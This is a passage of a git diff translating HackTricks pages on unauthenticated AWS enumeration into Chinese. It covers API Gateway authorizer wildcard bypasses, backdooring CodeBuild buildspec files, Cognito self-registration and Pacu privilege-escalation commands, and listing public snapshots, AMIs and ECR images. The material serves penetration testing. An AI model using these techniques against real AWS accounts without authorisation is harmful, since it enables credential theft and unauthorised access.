的网址,**与组织相关的别名**。 ### Marketplace -If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used. +如果供应商在 **市场中有实例,** 您可以获取他使用的 AWS 账户的所有者 ID(账户 ID)。 ### Snapshots -- Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots) -- RDS public snapshots (RDS -> Snapshots -> All Public Snapshots) -- Public AMIs (EC2 -> AMIs -> Public images) +- 公共 EBS 快照 (EC2 -> Snapshots -> Public Snapshots) +- RDS 公共快照 (RDS -> Snapshots -> All Public Snapshots) +- 公共 AMI (EC2 -> AMIs -> Public images) ### Errors -Many AWS error messages (even access denied) will give that information. 
+许多 AWS 错误消息(甚至访问被拒绝)将提供该信息。 ## References - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md index 5a69bebe0..6fb3105dd 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md @@ -2,59 +2,51 @@ {{#include ../../../banners/hacktricks-training.md}} -### API Invoke bypass - -According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): +### API 调用绕过 +根据演讲 [使用 AWS API Gateway Lambda 授权者的攻击向量 - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE),Lambda 授权者可以 **使用 IAM 语法** 配置以授予调用 API 端点的权限。这是 [**来自文档**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Permission", - "Action": ["execute-api:Execution-operation"], - "Resource": [ - "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" - ] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Permission", +"Action": ["execute-api:Execution-operation"], +"Resource": [ +"arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" +] +} +] } ``` +给端点调用权限的这种方式的问题在于**"\*"意味着"任何"**,并且**不再支持正则表达式语法**。 -The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**. +一些例子: -Some examples: - -- A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example. +- 规则如`arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*`为了给每个用户访问`/dashboard/user/{username}`的权限,将会使他们访问其他路由,例如`/admin/dashboard/createAdmin`。 > [!WARNING] -> Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\ -> So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ -> Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example. +> 请注意**"\*"不会因斜杠而停止扩展**,因此,如果您在api-id中使用"\*",它也可能表示"任何阶段"或"任何方法",只要最终的正则表达式仍然有效。\ +> 所以`arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ +> 可以验证对路径`/prod/GET/dashboard/admin`的测试阶段的post请求。 -You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted. 
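作为示意(下面的 API ID、区域、令牌与路径均为假设的占位符),可以用同一个有效的授权头去请求授权策略本不打算放行的路径,以验证上述通配符是否放行过宽:
```bash
# 正常预期被允许的路径(对应上文的 /dashboard/user/{username})
curl -H "Authorization: <valid-token>" \
  "https://<api-id>.execute-api.<region>.amazonaws.com/prod/dashboard/user/alice"

# 由于 "*" 会跨越斜杠扩展,类似 prod/*/dashboard/* 的资源也可能放行下面这种请求
curl -H "Authorization: <valid-token>" \
  "https://<api-id>.execute-api.<region>.amazonaws.com/prod/admin/dashboard/createAdmin"
```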
+您应该始终清楚您想要允许访问的内容,然后检查授予的权限是否可能存在其他场景。 -For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints). +有关更多信息,除了[**文档**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html),您可以在[**这个官方aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints)中找到实现授权者的代码。 -### IAM Policy Injection +### IAM策略注入 -In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**. - -### Public URL template +在同一个[**演讲**](https://www.youtube.com/watch?v=bsPKk7WDOnE)中,暴露了如果代码使用**用户输入**来**生成IAM策略**,则可以在其中包含通配符(以及其他如"."或特定字符串),目的是**绕过限制**。 +### 公共URL模板 ``` https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} ``` +### 从公共 API Gateway URL 获取账户 ID -### Get Account ID from public API Gateway URL +就像 S3 存储桶、数据交换和 Lambda URL 网关一样,可以通过公共 API Gateway URL 利用 **`aws:ResourceAccount`** **策略条件键** 找到账户的账户 ID。这是通过逐个字符查找账户 ID,利用策略中 **`aws:ResourceAccount`** 部分的通配符来实现的。\ +此技术还允许获取 **标签的值**,如果你知道标签键(有一些默认的有趣标签)。 -Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. 
+你可以在 [**原始研究**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) 和工具 [**conditional-love**](https://github.com/plerionhq/conditional-love/) 中找到更多信息,以自动化此利用。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md index 0284e2514..6d5409862 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md @@ -2,14 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` https://{random_id}.cloudfront.net ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md index d95410a62..3094e83f3 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md @@ -1,10 +1,10 @@ -# AWS - CodeBuild Unauthenticated Access +# AWS - CodeBuild 未认证访问 {{#include ../../../banners/hacktricks-training.md}} ## CodeBuild -For more info check this page: +有关更多信息,请查看此页面: {{#ref}} ../aws-services/aws-codebuild-enum.md @@ -12,28 +12,22 @@ For more info check this page: ### buildspec.yml -If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**. +如果您获得了对包含名为 **`buildspec.yml`** 文件的存储库的写入访问权限,您可以 **后门** 此文件,该文件指定将在 CodeBuild 项目中执行的 **命令** 并提取机密,妥协所做的事情,还可以妥协 **CodeBuild IAM 角色凭证**。 -Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example. +请注意,即使没有 **`buildspec.yml`** 文件,但您知道正在使用 Codebuild(或其他 CI/CD),**修改一些合法代码** 也可以让您获得反向 shell,例如。 -For some related information you could check the page about how to attack Github Actions (similar to this): +有关一些相关信息,您可以查看关于如何攻击 Github Actions 的页面(与此类似): {{#ref}} ../../../pentesting-ci-cd/github-security/abusing-github-actions/ {{#endref}} -## Self-hosted GitHub Actions runners in AWS CodeBuild - -As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. 
This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this: +## 在 AWS CodeBuild 中自托管的 GitHub Actions 运行器 +正如 [**文档中所示**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html),可以配置 **CodeBuild** 在配置的 Github 存储库中触发工作流时运行 **自托管的 Github actions**。这可以通过检查 CodeBuild 项目配置来检测,因为 **`事件类型`** 需要包含:**`WORKFLOW_JOB_QUEUED`**,并且在 Github 工作流中,因为它将选择一个 **自托管** 运行器,如下所示: ```bash runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }} ``` - -This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached. +这种Github Actions与AWS之间的新关系为从Github入侵AWS提供了另一种方式,因为Github中的代码将在附加了IAM角色的CodeBuild项目中运行。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md index 6f26f3a34..8e333067b 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md @@ -1,52 +1,44 @@ -# AWS - Cognito Unauthenticated Enum +# AWS - Cognito 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## Unauthenticated Cognito +## 未认证的 Cognito -Cognito is an AWS service that enable developers to **grant their app users access to AWS services**. Developers will grant **IAM roles to authenticated users** in their app (potentially people willbe able to just sign up) and they can also grant an **IAM role to unauthenticated users**. +Cognito 是一个 AWS 服务,使开发者能够 **授予他们的应用用户访问 AWS 服务的权限**。开发者将为其应用中的 **认证用户授予 IAM 角色**(潜在地,用户可以直接注册),他们也可以为 **未认证用户授予 IAM 角色**。 -For basic info about Cognito check: +有关 Cognito 的基本信息,请查看: {{#ref}} ../aws-services/aws-cognito-enum/ {{#endref}} -### Identity Pool ID +### 身份池 ID -Identity Pools can grant **IAM roles to unauthenticated users** that just **know the Identity Pool ID** (which is fairly common to **find**), and attacker with this info could try to **access that IAM rol**e and exploit it.\ -Moreoever, IAM roles could also be assigned to **authenticated users** that access the Identity Pool. If an attacker can **register a user** or already has **access to the identity provider** used in the identity pool you could access to the **IAM role being given to authenticated** users and abuse its privileges. +身份池可以为 **仅知道身份池 ID 的未认证用户** 授予 **IAM 角色**(这在 **查找** 时相当常见),拥有此信息的攻击者可能会尝试 **访问该 IAM 角色** 并利用它。\ +此外,IAM 角色也可以分配给访问身份池的 **认证用户**。如果攻击者能够 **注册用户** 或已经 **访问身份池中使用的身份提供者**,则可以访问 **授予认证用户的 IAM 角色** 并滥用其权限。 -[**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-identity-pools.md). +[**查看如何做到这一点**](../aws-services/aws-cognito-enum/cognito-identity-pools.md)。 -### User Pool ID +### 用户池 ID -By default Cognito allows to **register new user**. Being able to register a user might give you **access** to the **underlaying application** or to the **authenticated IAM access role of an Identity Pool** that is accepting as identity provider the Cognito User Pool. [**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration). 
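作为一个最小示意(其中的 client-id、区域、邮箱和密码均为假设的占位符),如果用户池开放了自助注册,通常可以直接用 AWS CLI 完成注册和确认:
```bash
# 示意:向目标用户池客户端自助注册一个新用户(只需要 client-id,不需要目标账户的凭证)
aws cognito-idp sign-up --region <region> \
  --client-id <user-pool-client-id> \
  --username attacker@example.com \
  --password '<Str0ngPassw0rd!>' \
  --user-attributes Name=email,Value=attacker@example.com

# 使用邮箱收到的验证码确认该用户
aws cognito-idp confirm-sign-up --region <region> \
  --client-id <user-pool-client-id> \
  --username attacker@example.com \
  --confirmation-code <code-from-email>
```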
+默认情况下,Cognito 允许 **注册新用户**。能够注册用户可能会使您 **访问** 到 **基础应用程序** 或 **接受 Cognito 用户池作为身份提供者的身份池的认证 IAM 访问角色**。 [**查看如何做到这一点**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration)。 -### Pacu modules for pentesting and enumeration +### Pacu 模块用于渗透测试和枚举 -[Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +[Pacu](https://github.com/RhinoSecurityLabs/pacu),AWS 利用框架,现在包括 "cognito\_\_enum" 和 "cognito\_\_attack" 模块,这些模块自动枚举账户中的所有 Cognito 资产并标记弱配置、用于访问控制的用户属性等,同时还自动创建用户(包括 MFA 支持)和基于可修改自定义属性、可用身份池凭证、可假设角色的 ID 令牌等的权限提升。 -For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. +有关模块功能的描述,请参见 [博客文章](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2) 的第 2 部分。有关安装说明,请参见主 [Pacu](https://github.com/RhinoSecurityLabs/pacu) 页面。 -#### Usage - -Sample `cognito__attack` usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: +#### 用法 +示例 `cognito__attack` 用法,尝试在给定身份池和用户池客户端上进行用户创建和所有权限提升向量: ```bash Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. 
visible in the current AWS account: - +示例 cognito\_\_enum 用法,以收集当前 AWS 账户中可见的所有用户池、用户池客户端、身份池、用户等: ```bash Pacu (new:test) > run cognito__enum ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md index 004a92c2b..d6b013629 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md @@ -1,15 +1,9 @@ -# AWS - DocumentDB Unauthenticated Enum +# AWS - DocumentDB 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` .cluster-..docdb.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md index e9e7fa8e4..e495ac915 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md @@ -1,19 +1,15 @@ -# AWS - DynamoDB Unauthenticated Access +# AWS - DynamoDB 未认证访问 {{#include ../../../banners/hacktricks-training.md}} ## Dynamo DB -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-dynamodb-enum.md {{#endref}} -Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB. +除了访问所有 AWS 或某些被攻陷的外部 AWS 账户,或者在与 DynamoDB 通信的应用程序中存在一些 SQL 注入外,我不知道还有其他选项可以通过 DynamoDB 访问 AWS 账户。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md index 657bf7f3a..e2f79a64b 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md @@ -1,18 +1,18 @@ -# AWS - EC2 Unauthenticated Enum +# AWS - EC2 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## EC2 & Related Services +## EC2 及相关服务 -Check in this page more information about this: +在此页面查看更多信息: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} -### Public Ports +### 公共端口 -It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it. +可以将 **虚拟机的任何端口暴露给互联网**。根据 **暴露端口上运行的内容**,攻击者可能会利用它。 #### SSRF @@ -20,10 +20,9 @@ It's possible to expose the **any port of the virtual machines to the internet** https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} -### Public AMIs & EBS Snapshots - -AWS allows to **give access to anyone to download AMIs and Snapshots**. 
You can list these resources very easily from your own account: +### 公共 AMI 和 EBS 快照 +AWS 允许 **任何人访问以下载 AMI 和快照**。您可以非常轻松地从自己的账户列出这些资源: ```bash # Public AMIs aws ec2 describe-images --executable-users all @@ -38,11 +37,9 @@ aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLo aws ec2 describe-snapshots --restorable-by-user-ids all aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")' ``` +如果您发现一个可以被任何人恢复的快照,请确保查看 [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) 以获取下载和掠夺快照的说明。 -If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot. - -#### Public URL template - +#### 公共 URL 模板 ```bash # EC2 ec2-{ip-seperated}.compute-1.amazonaws.com @@ -50,15 +47,8 @@ ec2-{ip-seperated}.compute-1.amazonaws.com http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 https://{user_provided}-{random_id}.{region}.elb.amazonaws.com ``` - -### Enumerate EC2 instances with public IP - +### 枚举具有公共 IP 的 EC2 实例 ```bash aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md index 2febbed62..3cd844602 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md @@ -1,38 +1,30 @@ -# AWS - ECR Unauthenticated Enum +# AWS - ECR 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} ## ECR -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ecr-enum.md {{#endref}} -### Public registry repositories (images) - -As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image. +### 公共注册表存储库(镜像) +如ECS枚举部分所述,公共注册表是**任何人都可以访问的**,使用格式**`public.ecr.aws//`**。如果攻击者找到公共存储库URL,他可以**下载镜像并在镜像的元数据和内容中搜索敏感信息**。 ```bash aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text ``` - > [!WARNING] -> This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo. +> 这也可能发生在 **私有注册表** 中,其中注册表策略或存储库策略 **授予访问权限,例如 `"AWS": "*"`**。任何拥有 AWS 账户的人都可以访问该存储库。 -### Enumerate Private Repo - -The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry. 
+### 枚举私有存储库 +工具 [**skopeo**](https://github.com/containers/skopeo) 和 [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) 可用于列出私有注册表中可访问的存储库。 ```bash # Get image names skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+' crane ls | sed 's/ .*//' ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md index 8d0b02ba2..60684d978 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md @@ -1,19 +1,18 @@ -# AWS - ECS Unauthenticated Enum +# AWS - ECS 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} ## ECS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} -### Publicly Accessible Security Group or Load Balancer for ECS Services - -A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks. +### 对 ECS 服务公开可访问的安全组或负载均衡器 +配置错误的安全组 **允许来自互联网的入站流量 (0.0.0.0/0 或 ::/0)** 可能会使 AWS 资源暴露于攻击之中。 ```bash # Example of detecting misconfigured security group for ECS services aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]' @@ -21,9 +20,4 @@ aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contain # Example of detecting a publicly accessible load balancer for ECS services aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]' ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md index 3a73a7328..a4d69ded2 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md @@ -4,7 +4,7 @@ ## Elastic Beanstalk -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md @@ -12,30 +12,24 @@ For more information check: ### Web vulnerability -Note that by default Beanstalk environments have the **Metadatav1 disabled**. +请注意,默认情况下,Beanstalk 环境的 **Metadatav1 被禁用**。 -The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`** +Beanstalk 网页的格式为 **`https://-env..elasticbeanstalk.com/`** ### Insecure Security Group Rules -Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**. +配置错误的安全组规则可能会使 Elastic Beanstalk 实例暴露于公众。**过于宽松的入站规则,例如允许来自任何 IP 地址 (0.0.0.0/0) 的敏感端口流量,可能会使攻击者访问实例**。 ### Publicly Accessible Load Balancer -If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. 
While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments. +如果 Elastic Beanstalk 环境使用负载均衡器,并且负载均衡器配置为公开可访问,攻击者可以 **直接向负载均衡器发送请求**。虽然这对于旨在公开访问的 Web 应用程序可能不是问题,但对于私有应用程序或环境可能会成为问题。 ### Publicly Accessible S3 Buckets -Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**. +Elastic Beanstalk 应用程序通常在部署前存储在 S3 存储桶中。如果包含应用程序的 S3 存储桶是公开可访问的,攻击者可能会 **下载应用程序代码并搜索漏洞或敏感信息**。 ### Enumerate Public Environments - ```bash aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md index 6ed2b74fe..76fedaa44 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md @@ -2,15 +2,9 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` https://vpc-{user_provided}-[random].[region].es.amazonaws.com https://search-{user_provided}-[random].[region].es.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md index b6092fda4..c7b2352c3 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md @@ -1,180 +1,162 @@ -# AWS - IAM & STS Unauthenticated Enum +# AWS - IAM & STS 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## Enumerate Roles & Usernames in an account +## 枚举账户中的角色和用户名 -### ~~Assume Role Brute-Force~~ +### ~~假设角色暴力破解~~ > [!CAUTION] -> **This technique doesn't work** anymore as if the role exists or not you always get this error: +> **此技术不再有效**,因为无论角色是否存在,您总是会收到此错误: > > `An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas` > -> You can **test this running**: +> 您可以**通过运行以下命令进行测试**: > > `aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example` -Attempting to **assume a role without the necessary permissions** triggers an AWS error message. 
